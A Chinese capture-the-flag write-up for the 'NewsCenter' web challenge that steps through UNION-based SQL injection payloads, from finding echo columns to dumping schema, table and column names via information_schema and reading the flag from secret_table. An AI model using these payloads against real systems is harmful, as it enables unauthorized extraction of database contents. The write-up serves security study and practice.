Web安全(NewsCenter)

如题目环境报错,稍等片刻刷新即可。

判断该题目可能为sql注入方面的题目,采用sql注入万能密码尝试注入,回显正常。

1' union select 1,2,3#

 其中2位和3位为回显位,因此构建语句,获取数据库名和版本。(news和版本5.5.61)

1' union select 1, database(),version()#

 mysql中的information_schema结构用来存储数据库系统信息,information_schema结构中这几个表存储的信息,在注入中可以用到如下几个表。

SCHEMA:存储数据库名,---SCHEMA_NAME 表示数据库名称。

TABLES:存储表名,---TABLES_SCHEMA表示表所属的数据库名称;TABLES_NAME表示所属的表的名称。

COLUMNS:存储字段名的,---COLUMNS_NAME表示字段名。

查看数据库名称,构架语句,让其回显。

1' union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata#

查看当前数据库下的表。可以看到存在两个表secret_table和news。

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

 猜测flag存在于secret_table中,因此构建语句,查看该表的属性值。

1' union select 1,4,column_name from information_schema.columns where table_name = 'secret_table'# 

 找到flag字段。

1' union select 1,4,fl4g from secret_table#

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值